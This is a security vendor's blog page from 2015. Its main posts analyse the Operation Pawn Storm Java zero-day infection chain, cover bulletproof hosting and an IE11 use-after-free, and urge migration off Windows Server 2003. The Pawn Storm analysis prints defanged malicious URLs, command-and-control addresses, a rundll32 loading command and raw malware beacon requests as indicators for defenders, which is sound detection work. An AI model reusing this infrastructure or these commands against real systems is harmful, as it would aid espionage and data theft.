Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:


  • Mobile Vulnerabilities

  • Zero-Day Alerts

  • Recent Posts

  • Calendar

    August 2015
    S M T W T F S
    « Jul    
     1
    2345678
    9101112131415
    16171819202122
    23242526272829
    3031  
  • Email Subscription

  • About Us

    What do LeaseWeb, Galkahost, and Spamz have in common? All of them, at one point or another, have functioned as cybercriminal hideouts in the form of bulletproof hosting services (BPHS).

    Simply put, BPHS is any “hosting facility that can store any type of malicious content like phishing sites, pornography, and command-and-control (C&C) infrastructure.” If I were to compare them with real-life crime rings, BPHS would be those hideouts criminals use to perform their illegal activities in private. In the context of cybercrime, it is very common to belittle the role of BPHSs in cybercriminal operations and instead focus on revealing the bad guys’ identities or discussing their modus operandi. But the truth is: BPHSs are crucial. They are so crucial, in fact, that many major cybercriminal groups would not be able to operate without them.

    So why not just shut them down? Well, the thing with BPHS takedowns is that they are easier said than done.

    In my paper, “Criminal Hideouts for Lease: Bulletproof Hosting Services”, I cite several factors that make BPHSs an imposing challenge for security and law enforcement organizations. For one, many BPHS providers operate under the guise of legitimate and legal hosting providers. This makes tracking them a lot trickier.

    Running BPHS as a Business

    BPHS providers usually choose one of three business models when building their services, as follows:

    • Model 1: Dedicated bulletproof servers
      BPHS providers create a convincing business front to avoid suspicion from law enforcement. They usually cater to customers who need to host content that may be considered illegal in certain countries.
    • Model 2: Compromised dedicated servers
      BPHS providers choose to compromise dedicated servers and rent these out to parties who wish to host malicious content.
    • Model 3: Abused cloud-hosting services
      Cybercriminals abuse cloud-hosting services like Amazon Web Services (AWS), Hetzner, OVH, and LeaseWeb to host C&C servers or drop stolen data, among other malicious purposes.

    It is important for these BPHS providers to be able to retain their name or domain for a long time to show how adept they are in keeping customers’ activities confidential, particularly from security researchers and law enforcers. Longtime providers are usually kept afloat by their capability to provide immediate technical support, quickly migrate in case they’re blacklisted, protect from DDoS attacks, and advertise cleverly to reach their specific clientele.

    Figure 1. Sample of a BPHS provider with expensive offerings

    Pricing for BPHSs depends on the risk involved in hosting certain content. Providers in several countries offer as low as US$2 per month for low-risk content, while servers based in China, Bolivia, Iran, and the Ukraine can go as high as US$300 per month for critical infrastructure projects or high-risk content. (You can find a more detailed description of the risk ratings or the toxicity of BPHS servers in the paper.)

    Takedown Impossible

    Another challenge for security and law enforcement organizations is the fact that these services operate in locations that do not heavily police cybercrime. BPHSs are often based in countries with lax regulations and laws that penalize and protect against cybercriminal activities.

    We looked at several BPHS providers in different countries and noted the types of malicious content they frequently host. Do note that this list is not exhaustive. There are many more bulletproof hosts that operate in other countries not cited here.

    Figure 2. Malicious content found in BPHS servers in certain countries

    My FTR colleague, Bob McArdle, sums up the challenges BPHSs pose pretty well: “The very nature of BPHSs is that they protect malicious activity against law enforcement, giving cybercriminals the much-needed loophole to wriggle out of and escape from the clutches of both law enforcement and the security industry. That loophole unfortunately largely remains open today.”

    The paper contains more insights on BPHSs as well as a system of classifying them to help out my fellow security researchers and law enforcements in their own investigations.

    Click on the thumbnail below to read the paper “Criminal Hideouts for Lease: Bulletproof Hosting Services.”

     
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon  

    Operation Pawn Storm is a campaign known to target military, embassy, and defense contractor personnel from the United States and its allies. The attackers behind Operation Pawn Storm have been active since at least 2007 and they continue to launch new campaigns.

    Over the past year or so, we have seen numerous techniques and tactics employed by this campaign, such as the use of an iOS espionage app, and the inclusion of new targets like the White House. Through our on-going investigation and monitoring of this targeted attack campaign, we found suspicious URLs that hosted a newly discovered zero-day exploit in Java now identified by Oracle as CVE-2015-2590. This is the first time in nearly two years that a new Java zero-day vulnerability was reported.

    The report below outlines the traffic observed as part of the attack, not the exploit itself. Our blog entry on how the exploit itself works can be found here. This blog entry is intended to help readers identify traffic in their network that would indicate if such an exposure had occurred. We strongly recommend that all readers roll out the Oracle patch as soon as possible

    Infection sequence

    Trend Micro has observed that an entity belonging to the target profile received an email that contains the following URL:

    • hxxp://ausameetings[.]com/url?={BLOCKED}/2015annualmeeting/

    It is worth noting that the spearphishing domain used is ausameetings[.]com, a play on the valid domain “ausameetings.org,” which is a site for AUSA’s (Association of the United States Army) annual exposition, commonly held in mid-October. The domain was only registered last July 8, which implies a one-time use for a specific set of targets.

    When assessing this URL, it was determined that the most probable infection sequence is:

    Figure 1. Infection chain

    Like all multi-stage infections, a successful execution of the previous stage is required before moving to the next stage down. In Stage 1, the sequence is initiated by clicking on the URL embedded within the victim’s spearphishing email.

    Once the Java exploit of Stage 1 is successful, it downloads the PE file (Stage 2). Once the PE file is downloaded and executed it drops and runs the DLL file (Stage 3) which is the final component to infect the machine with SEDNIT.

    The information that we have on each of these steps is as follows.
    Further information on each of these stages can be found in the sections below.

    Stage Type SHA1 File Name File Size Trend Micro Detection
    Stage 1 Java Exploit 95dc765700f5af406883
    d07f165011d2ff8dd0fb
    Spearphishing URL matching hxxp://ausameetings[.]com/url?=[a-zA-Z0-9]{7}/2015annualmeeting/ JAVA_DLOADR.EFD
    Stage 2 PE b4a515ef9de037f18d96
    b9b0e48271180f5725b7
    Drops as cormac.mcr

    End resulting file on host system as vhgg5hkvn25.exe
    1,619,968 bytes TROJ_DROPPR.CXC
    Stage 3 DLL 21835aafe6d46840bb69
    7e8b0d4aac06dec44f5b
    api-ms-win-downlevel-profile-l1-1-0.dll 40,960 bytes TSPY_SEDNIT.C

    Stage 1 – the Java exploit

    The first stage of the infection sequence comes through a targeted, spearphishing attempt against the victim, which is the observed method for Operation Pawn Storm attacks.

    The initial spearphishing URL is constructed similar to:

    • hxxp://ausameetings[.]com/url?=[a-zA-Z0-9]{7}/2015annualmeeting/

    The web pages on this domain that were found to drop the Java zero-day exploit include:

    • 1_2015annualmeeting index.htm (19,225 bytes) – detected as HTML_JNLPER.HAQ
    • 3_544306 index.htm (4,077 bytes) – detected as HTML_JNLPER.HAQ

    The network traffic observed for the infection sequence of this stage is:

    1. Send the initial POST as per the spearphishing email to ausameetings[.]com, which includes the 2015annualmeeting URI path.
    2. Send an encoded POST call, which, when decoded, is the variable to construct the subsequently used URI path. This is particularly interesting as it appears that each URI path on the malicious server is customized by the victim’s infection, rather than static on the web server.
    3. The victim machine then does a variety of GET calls to pull down JPG, JNLP, and Java class files.
    4. If the Java class files cannot be found on the primarily domain (ausameetings[.]com), it appears to instead attempt to get these files from a hardcoded IP (87[.]236[.]215[.]132).
    5. Once the class files are downloaded, the victim machine then does a GET call to fetch the file cormac.mcr. This file is the PE file for Stage 2.

    For completeness, the specific traffic calls observed relating to Stage 1 include the following:

    Result Protocol Host URL Size Content-Type
    200 HTTP ausameetings[.]com /url?={BLOCKED}/2015annualmeeting/ 19,225 text/html; charset=utf-8
    200 HTTP ausameetings[.]com /VFlmsRH/7311/4388/558923/?p2=KlW2HlMf&c=
    BMjNiBV&recr=Wr1mI7&p3=364397021&
    as=SAUmj&c=GY9oCdQ&
    22 text/html; charset=utf-8
    200 HTTP ausameetings[.]com /url/544036/ 4,077 text/html; charset=utf-8
    200 HTTP ausameetings[.]com /url/544036/line.jpg 22,500 text/html; charset=utf-8
    200 HTTP ausameetings[.]com /url/544036/right.jpg 97,247 text/html; charset=utf-8
    200 HTTP ausameetings[.]com /url/544036/init.jnlp 562 application/x-java-jnlp-file
    200 HTTP ausameetings[.]com /url/544036/ 4,077 text/html; charset=utf-8
    200 HTTP ausameetings[.]com /url/544036/jndi.properties 125 text/html; charset=utf-8
    404 HTTP ausameetings[.]com /url/544036/Go.class 0 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/Go.class 1,373 text/html; charset=utf-8
    404 HTTP 87[.]236[.]215[.]132 /crossdomain.xml 0 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/App.class 7,552 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/Help.class 5,667 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/PhantomSuper.class 763 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/ArrayReplace.class 729 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/App$PassHandleController.class 980 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/Converter.class 2,820 text/html; charset=utf-8
    200 HTTP 87[.]236[.]215[.]132 /2/MyByteArrayInputStream.class 1,282 text/html; charset=utf-8
    404 HTTP 87[.]236[.]215[.]132 /2/pkg/None2.class 0 text/html; charset=utf-8
    404 HTTP 87[.]236[.]215[.]132 /2/pkg/None.class 0 text/html; charset=utf-8
    200 HTTP ausameetings[.]com /url/544036/cormac.mcr 1,619,968 application/octet-stream

    Trend Micro detects these Java class files as JAVA_DLOADR.EFD:

    • App.class (7,552 bytes)
    • Go.class (1,373 bytes)
    • Help.class (5,667 bytes)

    The second and third traffic calls in the traffic pattern are particularly interesting to note.


    Figure 2. Traffic patterns (click the image to enlarge)

    One can observe that the second call sends a POST to ausumeetings[.]com, and is returned with a text responsecfa that then subsequently is used as the URI path for the subsequent HTTP requests.

    Stage 2 – The PE file

    Stage 2 involves downloading a PE file. Trend Micro detects this file as TROJ_DROPPR.CXC. The primary purpose of this PE is to drop and load the DLL executable. It is downloaded as Cormac.mcr, but once extracted, the file name is converted into a randomized file name. It is installed into the %USERPROFILE% directory and then executed, creating a service by the same name.

    During its installation, a variety of other services also appear to be hooked, including lsass, lsm, and conhost, amongst others.


    Figure 3. Observed processes (click the image to enlarge)

    Once the malware is executed, it will drop the Stage 3 DLL file with filename api-ms-win-downlevel-profile-l1-1-0.dll in the %TEMP% directory. To load the malware, it executes rundll32.exe using the following command:

    • rundll32.exe “%temp%/api-ms-win-downlevel-profile-l1-1-0.dll”,init

    Stage 3 – The DLL file

    This third stage involves a DLL file, which we detect as TSPY_SEDNIT.C. When the PE file triggers the DLL (in this instance, %windir%\system32\RunDll32.exe Command: “%windir%\system32\RunDll32.exe ” “C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ap i-ms-win-downlevel-profile-l1-1-0.dll”,init), the following traffic was observed.

    1 POST /ESL/YxF8bM/f/MFS.pdf/?duJ=OJYKZRlzy1tddcpaKjU= HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: www.google.com
    Content-Length: 0
    Note: Assumed to be a local connectivity test traffic call.
    2 POST /RGLw/ofEK/5w2a.htm/?6=9SpyZtTPs1iQybJZ54k= HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 192[.]111[.]146[.]185
    Content-Length: 830
    3 POST /hP/Bo/S/2z.htm/?WDC=TJrXZm1/FlgpeRdZXjk= HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: www.google.com
    Content-Length: 0
    Note: Assumed to be a local connectivity test traffic call.
    4 POST /C9zl/LJ9.zip/?hP=mLgAZ7ldwVn9W8BYihs= HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 192[.]111[.]146[.]185
    Content-Length: 0
    5 POST /k9/eR3/a/UE/eR.pdf/?bKC=xCCmnuXFZ6Chw2ah1oM= HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 192[.]111[.]146[.]185
    Content-Length: 26

    It bears stressing that we do not encourage using the data presented above as IOCs for your own analysis. The network traffic generated by this stage was a challenge to assess as it appears to have polymorphic capabilities in the creation of URI paths utilized to pull down files. After assessing the samples multiple times, each network traffic infection sequence appeared to be different, no matter what sequence of testing was performed (e.g., same machine, different machines, different geographic IP space globally, etc.).

    After detailed network forensics of the traffic, it was determined that no single stable URL path or URI query component (URI path component, file name, or URI query parameter) showed a consistent pattern (either same entry nor regex definable pattern), and further reverse engineering was required to determine the methods used to achieve this.

    As a result of this additional analysis, it was determined that the URI path is a random generated string with the following pattern:

    • ^/([a-zA-Z0-9]{1,6}/){1,5}[a-zA-Z0-9]{1,7}\.(xml|pdf|htm|zip)/\?[a-zA-Z0-9]{1,3}=<Encoded ID>

    Figure 4. Regex expression

    Included in the POST request is a data encoded with Base64 and XOR encryption. The encoded data contains the following system information of the infected machine:

    • OS Version
    • List of running processes
    • Hard Disk Drive Information
    • Volume Serial Number

    TSPY_SEDNIT.C connects to three C&C servers:

    • 192[.]111[.]146[.]185 (direct to IP call)
    • www[.]acledit[.]com
    • www[.]biocpl[.]org

    After sending the encrypted data it will wait for a reply which is encrypted by the same algorithm above.

    Phase 2 of the attack: the keystroke logger

    Based on our investigation of Operation Pawn Storm, we know that the infection happens in two stages:

    • In phase 1, opening the email attachment or clicking on the malicious URI initiates the download of the first level dropper, which installs the downloader component (.DLL file).
    • In phase 2, the downloader component communicates with a C&C server and downloads other components, and at the end of the chain a keylogger is installer. The keylogger sends data back to the C&C server.

    As of writing, we have not succeeded in triggering Phase 2, which will download a fourth stage malware from the C&C servers. This fourth stage malware is expected to be an encrypted executable file.

    Victims of the Attack

    A number of victims were identified during the course of our investigation. The targets are in the United States or Canada, and those we were able to identify via IP are big defense contractors, as typical for Operation PawnStorm.

    Countermeasures

    Trend Micro is already able to protect users against this threat without any necessary updates. The existing Sandbox with Script Analyzer engine, which is part of Trend Micro™ Deep Discovery, can be used to detect this threat by its behavior. The Browser Exploit Prevention feature in the Endpoint Security in Trend Micro™ Smart Protection Suite detects the exploit once the user accesses the URL that hosted it. Our Browser Exploit Prevention detects user systems against exploits targeting browsers or related plugins.

    Vulnerability protection in Trend Micro Deep Security protects user systems from threats that may leverage this vulnerability with the following DPI rule:

    • 1006857 – Oracle Java SE Remote Code Execution Vulnerability

    Oracle has also provided a security patch for the related vulnerability.

    Indicators of Compromise

    The following table summarizes the identified stable IOCs that can be used to search for this attack. The “Precision” column indicates how close to the direct parameter the indicator is, inversely indicating likelihood of collateral false positives.

    Stage Type Indicator Precision
    Infection Sequence – Stage 1 Domain ausameetings[.]com High
    Infection Sequence – Stage 1 Domain_IP 95[.]215[.]45[.]189 Low
    Infection Sequence – Stage 1 IP 87[.]236[.]215[.]132 High
    Infection Sequence – Stage 1 URIPath_FileName ArrayReplace.class Medium
    Infection Sequence – Stage 1 URIPath_FileName App$PassHandleController.class Medium
    Infection Sequence – Stage 1 URIPath_FileName Converter.class Medium
    Infection Sequence – Stage 1 URIPath_FileName MyByteArrayInputStream.class Medium
    Infection Sequence – Stage 1 URIPath_FileName None2.class Medium
    Infection Sequence – Stage 1 URIPath_FileName None.class Medium
    Infection Sequence – Stage 1->2 URIPath_FileName cormac.mcr High
    Infection Sequence – Stage 3 192[.]111[.]146[.]185 High
    Infection Sequence – Stage 3 IP_DirectCall 37[.]187[.]116[.]240 High
    Infection Sequence – Stage 3 Domain www[.]acledit[.]com High
    Infection Sequence – Stage 3 Domain www[.]biocpl[.]org High

    Other posts related to Operation Pawn Storm can be found here:

    Updated on July 15, 2015, 9:57AM PDT (UTC-7) to include revised detection name for DLL file and clarifications to the infection flow.

    Updated on July 15, 2015, 1:15PM PDT (UTC-7) to include more details about the infection flow.

    Updated on July 16, 2015 1:36PM PDT (UTC-7) to include screenshots of running processes.

     
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon  

    Oracle has released its Critical Patch Update for the month of July. The update provides fixes for 193 new security vulnerabilities, including the recently announced zero-day vulnerability first reported by Trend Micro researchers. What makes the zero-day discovery more notable is that it is being used in an ongoing targeted attack campaign, Operation Pawn Storm. This particular vulnerability was designated as CVE-2015-2590.

    Trend Micro first came across this vulnerability (and exploit) as part of our ongoing investigations on Operation Pawn Storm. We found email messages  targeting a certain armed forces of a NATO country and a US defense organization contained these malicious URLs where the Java exploit is hosted. This exploit sets off a chain of malware infections that lead to its final payload: an information-stealing malware.

    More details about the connections between Pawn Storm and this vulnerability will be made available in an upcoming blog entry.

    We recommend users install the latest security fix from Java immediately.

    Trend Micro is already able to protect users against exploits targeting this vulnerability without any necessary updates. The existing Sandbox with Script Analyzer engine, which is part of Trend Micro™ Deep Discovery, can be used to detect this threat by its behavior. The Browser Exploit Prevention feature in the Endpoint Security in Trend Micro™ Smart Protection Suite detects the exploit once the user accesses the URL that hosted it. Our Browser Exploit Prevention detects user systems against exploits targeting browsers or related plugins.

    Vulnerability protection in Trend Micro Deep Security protects user systems from threats that may leverage this vulnerability with the following DPI rule:

    • 1006857 – Oracle Java SE Remote Code Execution Vulnerability
     
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon  

    The hits keep on coming from the Hacking Team. After three separate Adobe Flash zero-days, another vulnerability that could take over user systems has been found. Our latest discovery is in Internet Explorer, and has been acknowledged by Microsoft and patched as part of the regular Patch Tuesday cycle as MS15-065. It has been designated as CVE-2015-2425. While we did find proof-of-concept (POC) code, there are still no known attacks exploiting this vulnerability.

    Vulnerability Information

    This zero-day vulnerability is a just-in-time (JIT) function UAF (Use-After-Free) vulnerability in jscript9.dll, specifically in the MutationObserver object. It occurs when MutationObserver tries to keep track of an element that has been already destroyed. Only Internet Explorer 11 is affected, as the older versions of the browser do not support this feature..

    The POC code we found confirms that an exploit can crash Internet Explorer 11 every time it is loaded. The crash point is at JMP EAX, where the value of EAX is an invalid heap address whose memory property is MEM_RESERVE, and this heap address was a JIT function address before it was freed. Internet Explorer 11 crashes as seen below; the EIP value is the same as EAX.

    Figure 1. Internet Explorer crash

    The function in jscrpt9.dll where the crash occurs is in the following picture:

    Figure 2. Function where jscript9.dll crashes

    Is it exploitable?

    Microsoft has confirmed that this particular vulnerability is exploitable.

    An ideal attack would use a heap spray to occupy the freed memory before it is used. However, because the freed memory is JIT memory and the freed memory is reserved by the heap for JIT generation, a normal heap spray is not possible. But a JIT spray can occupy this kind of memory, so JIT spray may be used to spray shellcode into the freed memory location. If the JMP EAX instruction jumps into the sprayed shellcode, this shellcode will be run within the context of the IE tab process.

    Simply put, if an attacker successfully exploits the vulnerability, he can basically run any code on the system. The extent of the attacker’s advances, though, is dependent on the OS version. On Windows 7, the IE11 tab process has the same privilege as the IE11 frame process. The shellcode will be run with the same privileges as the logged in user. On Windows 8.1 and later, the privilege of IE11 tab process is low by default. A successful attack would require a separate privilege escalation vulnerability.

    Conclusion

    The Hacking Team data has been available to the public (and attackers) for just over a week, which means it is readily available to attackers. We suggest that users running a vulnerable version of Internet Explorer 11 update to a patched version immediately; a patch has been made available as part of this month’s Patch Tuesday cycle.

    While only POC code exists, the vulnerability is still exploitable. We are monitoring for possible threats or attacks that target this vulnerability. We will update this post if any attacks are found in the wild.

     
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon  

    End-of-life fun times are coming to infosec departments everywhere—again.

    Just a year after the announcement of Windows XP’s end-of-life, we see another body in the OS graveyard: Windows Server 2003. After July 14th, servers running this venerable OS will no longer be receiving any more security updates. This would leave you out in the cold pretty soon, given the speed that new vulnerabilities are being published lately.

    Who’d want to be in such a position? According to a survey conducted by Spiceworks, 37% of the companies surveyed hadn’t migrated to a newer OS. Looking further into this statistic reveals a scarier side: of those companies, 8% had no plans to migrate at all and 1% did not know anything about plans for migration. The majority of the companies (48%) were partially migrated; only 15% have fully migrated.

    From those companies which were looking to finish their transitions, 25% planned to finish it at some point after July 14th. This includes another group that planned to complete their migration “at some point.” From a security standpoint, these are not the answers we were hoping for.

    The most common reason given for delaying migration was that “the system is still working or there’s no immediate need to migrate.” But organizations need to wake up to the fact that most attackers are not interested in their companies per se (although some of them probably are). Most cyber attackers try to get the lowest-hanging fruit by means of the least effort massive attacks, and guess what? Your fruit will be hanging much lower if you still have an ancient, out-of-support OS after July 14th. Our primer, Pulling the Plug on Windows Server 2003: Can You Still Manage Your Legacy Systems?, discusses the risks of discontinued support.

    Unlike migrating from Windows XP, migrating from Windows Server 2003 can be more challenging because we’re talking about servers this time, which means computers that cannot be easily be rebooted or turned off (let alone be down for a significant amount of upgrade time). Old server-side applications might not have been tested with more modern operating systems and upgrade might not be possible at all. However, we do recommend upgrading or moving to a virtual environment whenever it’s possible.

    The survey also had some bright spots. A significant percent of those migrations would go to virtualized environments, which are more easily defendable. The added layer called the hypervisor (the host OS in the virtual environment) can act as a moat against threats.

    So do we encourage companies to accelerate the rate of their migrations to newer server OSs? Yes, definitely! Would you want to be exposed to the new vulnerability of the day? We bet it will come shortly after July 15th. If you have trouble to stick to that timeline, sort those problems out as soon as possible. If the survey is any indication, most companies already have the licenses/cloud providers lined up; most mention it’s a matter of time or budget constraints. This is the classical security conundrum: more security or more convenience/cheaper/faster things? Bear in mind that convenience/price/speed can be quickly offset by a bad breach or attack. In my opinion, the decision is crystal clear.

    The Vulnerability Protection in our Smart Protection Suites can provide defense against exploits, although we still strongly recommend migration to minimize the attack surface. Companies worried about the costs and operational issues when it comes to emergency patches and system downtime can get immediate protection with the help of virtual patching technologies, such as the solutions found in Trend Micro Deep Security. Virtual patching minimizes exposure gaps, protecting users of Windows Server 2003 from exploits as they migrate to a newer platform.

    Read more about how virtual patching helps companies dodge compromise in our infographic, “Dodging a Compromise: A Peek at Exposure Gaps.”

     
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon  



     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice